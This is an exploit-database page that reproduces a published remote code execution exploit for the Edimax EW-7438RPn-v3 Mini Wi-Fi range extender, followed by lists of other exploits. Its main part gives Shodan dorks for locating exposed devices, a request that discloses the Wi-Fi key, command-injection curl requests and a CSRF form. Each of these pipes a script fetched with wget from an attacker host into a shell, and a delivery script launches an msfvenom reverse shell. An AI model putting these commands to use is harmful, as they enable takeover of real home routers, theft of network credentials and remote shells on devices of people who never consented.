Search for hundreds of thousands of exploits

"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution"

Author

Exploit author

Wadeek

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-04-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip

== Shodan Dorks ==

(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"
(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"

== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==

GET /wizard_reboot.asp
showSSID = "<WIRELESS-NAME>";
document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');

== Command Execution * ==

(Setup Mode)
curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

(Unsetup Mode with default password)
curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

== Cross-Site Request Forgery -> Command Execution * ==

<form action="http://edimaxext.setup/goform/mp" method="POST">
	<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
	<input type="submit" value="">
</form>

* [ delivery.sh ]
--------------------------------------------------------------------------------------
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://<LHOST>/reverse
busybox chmod +x reverse
./reverse &
--------------------------------------------------------------------------------------
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-04-14"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution"webappshardwareWadeek
2019-07-15"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass"webappshardwareWadeek
2018-11-12"TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)"webappshardwareWadeek
2018-10-30"NETGEAR WiFi Router R6120 - Credential Disclosure"webappshardwareWadeek
2018-08-09"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)"webappshardwareWadeek
2018-08-09"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)"webappshardwareWadeek
2018-06-25"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)"webappshardwareWadeek
2018-04-26"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion"webappsphpWadeek
2018-04-26"TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot"webappshardwareWadeek
2018-02-19"Aastra 6755i SIP SP4 - Denial of Service"doshardwareWadeek
2018-01-17"Belkin N600DB Wireless Router - Multiple Vulnerabilities"webappshardwareWadeek
2017-07-17"Belkin F7D7601 NetCam - Multiple Vulnerabilities"remotehardwareWadeek
2016-10-24"EC-CUBE 2.12.6 - Server-Side Request Forgery"webappsphpWadeek
2016-10-12"Categorizator 0.3.1 - SQL Injection"webappsphpWadeek
2016-10-12"OpenCimetiere 3.0.0-a5 - Blind SQL Injection"webappsphpWadeek
2016-10-12"NetBilletterie 2.8 - Multiple Vulnerabilities"webappsphpWadeek
2016-03-21"WordPress Plugin eBook Download 1.1 - Directory Traversal"webappsphpWadeek
2016-03-21"WordPress Plugin Import CSV 1.0 - Directory Traversal"webappsphpWadeek
2016-03-14"WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion"webappsphpWadeek
2015-05-18"Chronosite 5.12 - SQL Injection"webappsphpWadeek
2015-05-13"PHPCollab 2.5 - 'deletetopics.php' SQL Injection"webappsphpWadeek
2015-05-11"Pluck CMS 4.7 - Directory Traversal"webappsphpWadeek
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48318/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.